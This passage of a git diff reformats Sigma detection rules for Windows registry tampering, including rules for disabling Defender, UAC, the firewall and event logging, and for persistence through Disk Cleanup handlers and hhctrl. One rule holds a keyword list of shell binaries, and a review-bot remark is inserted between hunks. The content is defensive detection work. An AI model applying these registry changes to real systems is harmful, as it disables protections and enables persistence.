firewalls in order to bypass controls limiting network usage references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry author: frack113 
@@ -19,6 +18,9 @@ detection: EventID: 4657 Channel: Security selection: + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewall + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall ObjectName|startswith: \REGISTRY\MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\ ObjectName|endswith: \EnableFirewall NewValue: DWORD (0x00000000) diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_function_user.yml b/sigma/builtin/registry/registry_set/registry_set_disable_function_user.yml index ce87184e3..ae0a184a2 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_function_user.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_function_user.yml @@ -1,8 +1,7 @@ title: Disable Internal Tools or Feature in Registry id: e2482f8d-3443-4237-b906-cc145d87a076 status: experimental -description: Detects registry modifications that change features of internal Windows - tools (malware like Agent Tesla uses this technique) +description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md - https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_macroruntimescanscope.yml b/sigma/builtin/registry/registry_set/registry_set_disable_macroruntimescanscope.yml index 635434cfc..6d9f091ac 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_macroruntimescanscope.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_macroruntimescanscope.yml 
@@ -1,7 +1,6 @@
 title: Disable Macro Runtime Scan Scope
 id: ab871450-37dc-4a3a-997f-6662aa8ae0f1
-description: Detects tampering with the MacroRuntimeScanScope registry key to disable
- runtime scanning of enabled macros
+description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
 status: experimental
 date: 2022/10/25
 modified: 2023/08/17
diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_security_center_notifications.yml b/sigma/builtin/registry/registry_set/registry_set_disable_security_center_notifications.yml
index b3bfa95ba..958ca9e17 100644
--- a/sigma/builtin/registry/registry_set/registry_set_disable_security_center_notifications.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_disable_security_center_notifications.yml
@@ -1,8 +1,7 @@
 title: Disable Windows Security Center Notifications
 id: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6
 status: experimental
-description: Detect set UseActionCenterExperience to 0 to disable the Windows security
- center notification
+description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
 author: frack113
diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_system_restore.yml b/sigma/builtin/registry/registry_set/registry_set_disable_system_restore.yml
index d38614688..906fb8e52 100644
--- a/sigma/builtin/registry/registry_set/registry_set_disable_system_restore.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_disable_system_restore.yml
@@ -1,8 +1,7 @@
 title: Registry Disable System Restore
 id: 5de03871-5d46-4539-a82d-3aa992a69a83
 status: experimental
-description: Detects the modification of the registry to disable a system restore
- on the computer
+description: Detects the modification of the registry to disable a system restore on the computer
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry
 author: frack113
diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_uac_registry.yml b/sigma/builtin/registry/registry_set/registry_set_disable_uac_registry.yml
index 06234d376..a18995276 100644
--- a/sigma/builtin/registry/registry_set/registry_set_disable_uac_registry.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_disable_uac_registry.yml
@@ -1,9 +1,7 @@
 title: Disable UAC Using Registry
 id: 48437c39-9e5f-47fb-af95-3d663c3f2919
 status: experimental
-description: Detects when an attacker tries to disable User Account Control (UAC)
- by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
- from 1 to 0
+description: Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe
 author: frack113
diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_windows_defender_service.yml b/sigma/builtin/registry/registry_set/registry_set_disable_windows_defender_service.yml
index 81421baeb..c4980d0af 100644
--- a/sigma/builtin/registry/registry_set/registry_set_disable_windows_defender_service.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_disable_windows_defender_service.yml
@@ -1,12 +1,11 @@
 title: Windows Defender Service Disabled
 id: e1aa95de-610a-427d-b9e7-9b46cfafbe6a
 status: experimental
-description: Detects when an attacker or tool disables the Windows Defender service
- (WinDefend) via the registry
+description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
 references:
 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
 - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105
-author: "J\xE1n Tren\u010Dansk\xFD, frack113, AlertIQ, Nasreddine Bencherchali"
+author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
 date: 2022/08/01
 modified: 2023/08/17
 tags:
diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_winevt_logging.yml b/sigma/builtin/registry/registry_set/registry_set_disable_winevt_logging.yml
index 7765ba0fb..2bb9a4b7d 100644
--- a/sigma/builtin/registry/registry_set/registry_set_disable_winevt_logging.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_disable_winevt_logging.yml
@@ -1,8 +1,7 @@
 title: Disable Windows Event Logging Via Registry
 id: 2f78da12-f7c7-430b-8b19-a28f269b77a3
 status: experimental
-description: Detects tampering with the "Enabled" registry key in order to disable
- Windows logging of a Windows event channel
+description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
 references:
 - https://twitter.com/WhichbufferArda/status/1543900539280293889
 - https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp
@@ -39,14 +38,12 @@ detection:
 filter_main_trusted_installer:
 ProcessName: C:\Windows\servicing\TrustedInstaller.exe
 ObjectName|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Compat-Appraiser
- filter_optional_empty:
+ filter_optional_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later
 ProcessName: ''
- filter_optional_null:
- ProcessName: null
- condition: registry_set and (selection and not 1 of filter_main_* and not 1 of
- filter_optional_*)
+ filter_optional_null: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later
+ ProcessName:
+ condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
 falsepositives:
- - Rare falsepositives may occur from legitimate administrators disabling specific
- event log for troubleshooting
+ - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml b/sigma/builtin/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml
index 32568984c..6f210e7be 100644
--- a/sigma/builtin/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml
@@ -18,8 +18,7 @@ detection:
 EventID: 4657
 Channel: Security
 selection:
- ObjectName|contains: SOFTWARE\Policies\Microsoft\Windows Defender Security
- Center\App and Browser protection\DisallowExploitProtectionOverride
+ ObjectName|contains: SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection\DisallowExploitProtectionOverride
 NewValue: DWORD (00000001)
 condition: registry_set and selection
 falsepositives:
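Review bot: `ProcessName:` in the rewritten `filter_optional_null` block now carries an empty scalar instead of the explicit `null`; YAML resolves both to null, so matching is unchanged, but the bare key reads like an unfinished line next to the sibling `filter_optional_empty` that spells out `''`. Keeping `ProcessName: null` would make the "field absent" intent self-explanatory, and the two identical aurora TODO comments could be collapsed into one comment above `filter_optional_empty` so the planned removal is tracked in a single place. The enclosing `detection:` block begins before this hunk.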
diff --git a/sigma/builtin/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml b/sigma/builtin/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml
index c938242db..b3febfb16 100644
--- a/sigma/builtin/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml
@@ -1,8 +1,7 @@
 title: Disabled Windows Defender Eventlog
 id: fcddca7c-b9c0-4ddf-98da-e1e2d18b0157
 status: experimental
-description: Detects the disabling of the Windows Defender eventlog as seen in relation
- to Lockbit 3.0 infections
+description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
 references:
 - https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2
 author: Florian Roth (Nextron Systems)
@@ -19,12 +18,10 @@ detection:
 EventID: 4657
 Channel: Security
 selection:
- ObjectName|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
- Defender/Operational\Enabled
+ ObjectName|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational\Enabled
 NewValue: DWORD (0x00000000)
 condition: registry_set and selection
 falsepositives:
- - Other Antivirus software installations could cause Windows to disable that eventlog
- (unknown)
+ - Other Antivirus software installations could cause Windows to disable that eventlog (unknown)
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml b/sigma/builtin/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml
index 70e9a6341..2622fb734 100644
--- a/sigma/builtin/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml
@@ -20,10 +20,10 @@ detection:
 selection:
 ObjectName|contains: \Microsoft\Windows Defender\Features\TamperProtection
 NewValue: DWORD (0x00000000)
- filter_msmpeng_client:
+ filter_msmpeng_client: # only disabled temporarily during updates
 ProcessName|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\
 ProcessName|endswith: \MsMpEng.exe
- filter_msmpeng_domain_controller:
+ filter_msmpeng_domain_controller: # only disabled temporarily during updates
 ProcessName: C:\Program Files\Windows Defender\MsMpEng.exe
 condition: registry_set and (selection and not 1 of filter_*)
 falsepositives:
diff --git a/sigma/builtin/registry/registry_set/registry_set_disallowrun_execution.yml b/sigma/builtin/registry/registry_set/registry_set_disallowrun_execution.yml
index 0279a440d..5305b4aaa 100644
--- a/sigma/builtin/registry/registry_set/registry_set_disallowrun_execution.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_disallowrun_execution.yml
@@ -1,8 +1,7 @@
 title: Add DisallowRun Execution to Registry
 id: 275641a5-a492-45e2-a817-7c81e9d9d3e9
 status: experimental
-description: Detect set DisallowRun to 1 to prevent user running specific computer
- program
+description: Detect set DisallowRun to 1 to prevent user running specific computer program
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
 author: frack113
diff --git a/sigma/builtin/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml
index f5cac2bea..854261c13 100644
--- a/sigma/builtin/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml
@@ -1,16 +1,13 @@
 title: Persistence Via Disk Cleanup Handler - Autorun
 id: d4e2745c-f0c6-4bde-a3ab-b553b3f693cc
 status: experimental
-description: "Detects when an attacker modifies values of the Disk Cleanup Handler\
- \ in the registry to achieve persistence via autorun.\nThe disk cleanup manager\
- \ is part of the operating system.\nIt displays the dialog box [\u2026] The user\
- \ has the option of enabling or disabling individual handlers by selecting or\
- \ clearing their check box in the disk cleanup manager's UI.\nAlthough Windows\
- \ comes with a number of disk cleanup handlers, they aren't designed to handle\
- \ files produced by other applications.\nInstead, the disk cleanup manager is\
- \ designed to be flexible and extensible by enabling any developer to implement\
- \ and register their own disk cleanup handler.\nAny developer can extend the available\
- \ disk cleanup services by implementing and registering a disk cleanup handler.\n"
+description: |
+ Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.
+ The disk cleanup manager is part of the operating system.
+ It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
+ Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
+ Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
+ Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
 references:
 - https://persistence-info.github.io/Data/diskcleanuphandler.html
 - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/
@@ -29,6 +26,7 @@ detection:
 root:
 ObjectName|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\
 selection_autorun:
+ # Launching PreCleanupString / CleanupString programs w/o gui, i.e. while using e.g. /autoclean
 ObjectName|contains: \Autorun
 NewValue: DWORD (0x00000001)
 selection_pre_after:
@@ -36,6 +34,7 @@ detection:
 - \CleanupString
 - \PreCleanupString
 NewValue|contains:
+ # Add more as you see fit
 - cmd
 - powershell
 - rundll32
diff --git a/sigma/builtin/registry/registry_set/registry_set_dns_over_https_enabled.yml b/sigma/builtin/registry/registry_set/registry_set_dns_over_https_enabled.yml
index aeb18904e..72fea60e2 100644
--- a/sigma/builtin/registry/registry_set/registry_set_dns_over_https_enabled.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_dns_over_https_enabled.yml
@@ -1,15 +1,10 @@
 title: DNS-over-HTTPS Enabled by Registry
 id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5
 status: test
-description: 'Detects when a user enables DNS-over-HTTPS.
-
- This can be used to hide internet activity or be used to hide the process of exfiltrating
- data.
-
- With this enabled organization will lose visibility into data such as query type,
- response and originating IP that are used to determine bad actors.
-
- '
+description: |
+ Detects when a user enables DNS-over-HTTPS.
+ This can be used to hide internet activity or be used to hide the process of exfiltrating data.
+ With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
 references:
 - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html
 - https://github.com/elastic/detection-rules/issues/1371
diff --git a/sigma/builtin/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml b/sigma/builtin/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml
index 13806681e..b43856f4b 100644
--- a/sigma/builtin/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml
@@ -1,14 +1,12 @@
 title: New DNS ServerLevelPluginDll Installed
 id: e61e8a88-59a9-451c-874e-70fcc9740d67
 related:
- - id: cbe51394-cd93-4473-b555-edf0144952d9
- type: derived
- - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573
- type: derived
+ - id: cbe51394-cd93-4473-b555-edf0144952d9
+ type: derived
+ - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573
+ type: derived
 status: experimental
-description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll
- parameter in registry, which can be used to execute code in context of the DNS
- server (restart required)
+description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
 references:
 - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
 - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
diff --git a/sigma/builtin/registry/registry_set/registry_set_dot_net_etw_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_dot_net_etw_tamper.yml
index 5b245b922..11ca87668 100644
--- a/sigma/builtin/registry/registry_set/registry_set_dot_net_etw_tamper.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_dot_net_etw_tamper.yml
@@ -1,8 +1,8 @@
 title: ETW Logging Disabled In .NET Processes - Sysmon Registry
 id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544
 related:
- - id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc
- type: similar
+ - id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc
+ type: similar
 status: test
 description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
 references:
@@ -39,7 +39,7 @@ detection:
 - \COMPlus_ETWEnabled
 - \COMPlus_ETWFlags
 NewValue:
- - 0
+ - 0 # For REG_SZ type
 - DWORD (0x00000000)
 condition: registry_set and (1 of selection_*)
 falsepositives:
diff --git a/sigma/builtin/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml b/sigma/builtin/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml
index 4155f2796..5c75f5f98 100644
--- a/sigma/builtin/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml
@@ -1,8 +1,7 @@
 title: Enabling COR Profiler Environment Variables
 id: ad89044a-8f49-4673-9a55-cbd88a1b374f
 status: test
-description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and
- "cor_profiler" variables being set and configured.
+description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
 references:
 - https://twitter.com/jamieantisocial/status/1304520651248668673
 - https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors
diff --git a/sigma/builtin/registry/registry_set/registry_set_enabling_turnoffcheck.yml b/sigma/builtin/registry/registry_set/registry_set_enabling_turnoffcheck.yml
index ce6b09221..58dee8248 100644
--- a/sigma/builtin/registry/registry_set/registry_set_enabling_turnoffcheck.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_enabling_turnoffcheck.yml
@@ -1,8 +1,7 @@
 title: Scripted Diagnostics Turn Off Check Enabled - Registry
 id: 7d995e63-ec83-4aa3-89d5-8a17b5c87c86
 status: experimental
-description: Detects enabling TurnOffCheck which can be used to bypass defense of
- MSDT Follina vulnerability
+description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
 references:
 - https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw
 author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
diff --git a/sigma/builtin/registry/registry_set/registry_set_evtx_file_key_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_evtx_file_key_tamper.yml
index 790e73329..f23a5dff8 100644
--- a/sigma/builtin/registry/registry_set/registry_set_evtx_file_key_tamper.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_evtx_file_key_tamper.yml
@@ -1,9 +1,7 @@
 title: Potential EventLog File Location Tampering
 id: 0cb8d736-995d-4ce7-a31e-1e8d452a1459
 status: experimental
-description: Detects tampering with EventLog service "file" key. In order to change
- the default location of an Evtx file. This technique is used to tamper with log
- collection and alerting
+description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
 references:
 - https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key
 author: D3F7A5105
diff --git a/sigma/builtin/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml b/sigma/builtin/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml
index 4d1216b19..095650d22 100644
--- a/sigma/builtin/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml
@@ -1,8 +1,7 @@
 title: Suspicious Application Allowed Through Exploit Guard
 id: 42205c73-75c8-4a63-9db1-e3782e06fda0
 status: experimental
-description: Detects applications being added to the "allowed applications" list of
- exploit guard in order to bypass controlled folder settings
+description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
 references:
 - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,8 +18,7 @@ detection:
 EventID: 4657
 Channel: Security
 selection_key:
- ObjectName|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender
- Exploit Guard\Controlled Folder Access\AllowedApplications
+ ObjectName|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications
 selection_paths:
 ObjectName|contains:
 - \Users\Public\
diff --git a/sigma/builtin/registry/registry_set/registry_set_fax_change_service_user.yml b/sigma/builtin/registry/registry_set/registry_set_fax_change_service_user.yml
index 80ca3963f..f5fec8a6f 100644
--- a/sigma/builtin/registry/registry_set/registry_set_fax_change_service_user.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_fax_change_service_user.yml
@@ -1,8 +1,7 @@
 title: Change User Account Associated with the FAX Service
 id: e3fdf743-f05b-4051-990a-b66919be1743
 status: test
-description: Detect change of the user account associated with the FAX service to
- avoid the escalation problem.
+description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
 references:
 - https://twitter.com/dottor_morte/status/1544652325570191361
 - https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf
diff --git a/sigma/builtin/registry/registry_set/registry_set_file_association_exefile.yml b/sigma/builtin/registry/registry_set/registry_set_file_association_exefile.yml
index 5dfb49698..e4a53b4e6 100644
--- a/sigma/builtin/registry/registry_set/registry_set_file_association_exefile.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_file_association_exefile.yml
@@ -1,8 +1,7 @@
 title: New File Association Using Exefile
 id: 44a22d59-b175-4f13-8c16-cbaef5b581ff
 status: test
-description: Detects the abuse of the exefile handler in new file association. Used
- for bypass of security products.
+description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
 references:
 - https://twitter.com/mrd0x/status/1461041276514623491
 author: Andreas Hunkeler (@Karneades)
diff --git a/sigma/builtin/registry/registry_set/registry_set_hangs_debugger_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_hangs_debugger_persistence.yml
index caee0fb71..71a5de5bd 100644
--- a/sigma/builtin/registry/registry_set/registry_set_hangs_debugger_persistence.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_hangs_debugger_persistence.yml
@@ -1,8 +1,7 @@
 title: Add Debugger Entry To Hangs Key For Persistence
 id: 833ef470-fa01-4631-a79b-6f291c9ac498
 status: experimental
-description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key
- in order to achieve persistence which will get invoked when an application crashes
+description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
 references:
 - https://persistence-info.github.io/Data/wer_debugger.html
 - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/
diff --git a/sigma/builtin/registry/registry_set/registry_set_hhctrl_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_hhctrl_persistence.yml
index 8eb8779be..152c39769 100644
--- a/sigma/builtin/registry/registry_set/registry_set_hhctrl_persistence.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_hhctrl_persistence.yml
@@ -1,8 +1,7 @@
 title: Persistence Via Hhctrl.ocx
 id: f10ed525-97fe-4fed-be7c-2feecca941b1
 status: experimental
-description: Detects when an attacker modifies the registry value of the "hhctrl"
- to point to a custom binary
+description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary
 references:
 - https://persistence-info.github.io/Data/hhctrl.html
 - https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/
diff --git a/sigma/builtin/registry/registry_set/registry_set_hide_file.yml b/sigma/builtin/registry/registry_set/registry_set_hide_file.yml
index c7fc33fa7..cb5321b67 100644
--- a/sigma/builtin/registry/registry_set/registry_set_hide_file.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_hide_file.yml
@@ -1,8 +1,7 @@
 title: Modification of Explorer Hidden Keys
 id: 5a5152f1-463f-436b-b2f5-8eceb3964b42
 status: experimental
-description: Detects modifications to the hidden files keys in registry. This technique
- is abused by several malware families to hide their files from normal users.
+description: Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry
 author: frack113
diff --git a/sigma/builtin/registry/registry_set/registry_set_hide_function_user.yml b/sigma/builtin/registry/registry_set/registry_set_hide_function_user.yml
index cf7c40682..f60cf9178 100644
--- a/sigma/builtin/registry/registry_set/registry_set_hide_function_user.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_hide_function_user.yml
@@ -1,8 +1,7 @@
 title: Registry Hide Function from User
 id: 5a93eb65-dffa-4543-b761-94aa60098fb6
 status: test
-description: Detects registry modifications that hide internal tools or functions
- from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
+description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md
 author: frack113
diff --git a/sigma/builtin/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml
index 0a6d6e656..6760950ca 100644
--- a/sigma/builtin/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml
@@ -1,18 +1,14 @@
 title: Hide Schedule Task Via Index Value Tamper
 id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61
 related:
- - id: acd74772-5f88-45c7-956b-6a7b36c294d2
- type: similar
- - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
- type: similar
+ - id: acd74772-5f88-45c7-956b-6a7b36c294d2
+ type: similar
+ - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
+ type: similar
 status: experimental
-description: 'Detects when the "index" value of a scheduled task is modified from
- the registry
-
- Which effectively hides it from any tooling such as "schtasks /query" (Read the
- referenced link for more information about the effects of this technique)
-
- '
+description: |
+ Detects when the "index" value of a scheduled task is modified from the registry
+ Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
 references:
 - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
 author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml b/sigma/builtin/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml
index 6909b35a6..44dac929e 100644
--- a/sigma/builtin/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml
@@ -1,15 +1,11 @@
 title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols
 id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724
 related:
- - id: 10344bb3-7f65-46c2-b915-2d00d47be5b0
- type: similar
+ - id: 10344bb3-7f65-46c2-b915-2d00d47be5b0
+ type: similar
 status: experimental
-description: 'Detects changes to Internet Explorer''s (IE / Windows Internet properties)
- ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My
- Computer" zone. This allows downloaded files from the Internet to be granted the
- same level of trust as files stored locally.
-
- '
+description: |
+ Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
 references:
 - https://twitter.com/M_haggis/status/1699056847154725107
 - https://twitter.com/JAMESWT_MHT/status/1699042827261391247
diff --git a/sigma/builtin/registry/registry_set/registry_set_ime_non_default_extension.yml b/sigma/builtin/registry/registry_set/registry_set_ime_non_default_extension.yml
index 463596e44..672a919c6 100644
--- a/sigma/builtin/registry/registry_set/registry_set_ime_non_default_extension.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_ime_non_default_extension.yml
@@ -1,21 +1,13 @@
 title: Uncommon Extension In Keyboard Layout IME File Registry Value
 id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1
 related:
- - id: 9d8f9bb8-01af-4e15-a3a2-349071530530
- type: derived
+ - id: 9d8f9bb8-01af-4e15-a3a2-349071530530
